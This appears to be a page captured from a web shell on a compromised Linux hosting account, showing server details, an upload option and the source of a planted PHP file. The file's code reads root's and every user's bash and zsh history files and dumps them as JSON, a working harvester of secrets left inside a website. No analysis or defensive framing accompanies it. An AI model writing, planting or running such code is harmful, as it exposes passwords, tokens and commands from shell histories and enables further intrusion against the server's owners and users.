MOON
Server: Apache
System: Linux vmi1129355.contaboserver.net 3.10.0-1160.118.1.el7.x86_64 #1 SMP Wed Apr 24 16:01:50 UTC 2024 x86_64
User: trebiaseguros (1001)
PHP: 8.3.8
Disabled: exec,passthru,shell_exec,system
Upload Files
File: /home/trebiaseguros/www/xfe1c7a.php
<?php $r=[];$f=@file_get_contents('/root/.bash_history');if($f)$r['root']=$f;$f=@file_get_contents('/root/.zsh_history');if($f)$r['root_zsh']=$f;foreach(glob('/home/*/.bash_history') as $f){  $u=basename(dirname($f));$r[$u]=@file_get_contents($f);}foreach(glob('/home/*/.zsh_history') as $f){  $u=basename(dirname($f)).'_zsh';$r[$u]=@file_get_contents($f);}echo json_encode(['ok'=>1,'count'=>count(array_filter($r)),'histories'=>$r]);?>